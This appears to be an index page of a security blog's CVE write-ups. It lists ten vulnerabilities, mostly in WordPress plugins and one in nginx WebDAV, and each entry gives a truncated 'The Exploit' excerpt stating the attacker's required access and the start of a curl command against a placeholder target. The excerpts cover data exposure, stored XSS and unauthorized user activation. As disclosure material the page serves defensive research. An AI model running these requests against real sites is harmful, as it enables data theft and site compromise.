Articles

§06 · Field notes

CVE · PLUGINS · ZERO-DAYS
GitHub

CVE-2026-27654: nginx-dav-cve-2026-27654

## The Exploit Requires only network access to a DAV-enabled aliased prefix location; no privileged credentials are needed if the `MOVE`/`COPY` endpoint is exposed. ```bash curl -i -s -X MOVE 'http://TARGET/webdav/secret.txt' \ -H 'Host: TARGET' \ -H 'Destination: http://TA...


CVE-2025-14075

## The Exploit Unauthenticated attackers can retrieve customer records by calling the exposed AJAX action with a valid publicly accessible nonce and a target email address. ```bash curl 'https://TARGET_DOMAIN/wp-admin/admin-ajax.php' \ ...


CVE-2025-14450

## The Exploit Attacker needs an authenticated WordPress account with Subscriber-level access or higher. ```bash curl 'https://target.example.com/wp-admin/admin-ajax.php' \ -H 'Content-Type: application/x-www-form-urlencoded' \ -H 'Co...


CVE-2026-0682

## The Exploit Requires an authenticated Administrator account. ```bash TARGET="https://target.example" COOKIE="wordpress_logged_in_abcd1234=..." curl -i -X POST "$TARGET/wp-admin/admin.php?page=church_admin_sermons&action=save" \ -H "...


CVE-2025-8615

## The Exploit A contributor-level WordPress user can store the XSS payload in the `cubewp_shortcode_taxonomy` shortcode `title` attribute. ```bash curl -i -X POST 'https://TARGET/wp-json/wp/v2/pages/123' \ -H 'Cookie: wordpress_logged_...


CVE-2025-12129

## The Exploit Unauthenticated attacker. ```bash curl -s -G 'https://TARGET/wp-json/cubewp-posts/v1/query-new' \ --data-urlencode 'paged=1' \ -H 'Accept: application/json' | jq '.posts[] | {ID, post_title, post_status, post_password}'...


CVE-2025-14029

## The Exploit An unauthenticated attacker can approve an arbitrary event by calling the plugin’s AJAX endpoint with `action=ajax_admin_event_approval`, `eventlist`, and a valid `event_approval_nonce`. ```bash curl -s "https://TARGET_HOST...


CVE-2026-0913

## The Exploit An authenticated attacker with Contributor-level access can inject a stored XSS payload into the `usp_access` shortcode `deny`/`content` attributes. ```bash curl -i -X POST 'https://TARGET/wp-json/wp/v2/posts' \ -H 'Autho...


CVE-2025-12641

## The Exploit No authenticated session is required beyond the public ticket/registration page nonce already available on the site. ```bash curl 'https://target.example/?wpas-do=mr_activate_user&user_id=1&_wpnonce=PUBLIC_WP_NONCE' \ -H ...


CVE-2025-13062

## The Exploit Requires authenticated author-level access or higher. ```bash curl -i -X POST "http://TARGET/wp-admin/admin-ajax.php" \ -H "Cookie: wordpress_logged_in_XXXXXXXXXXXXXXXXXXXXXXXX" \ -F "action=supreme_upload_json" \ -F ...
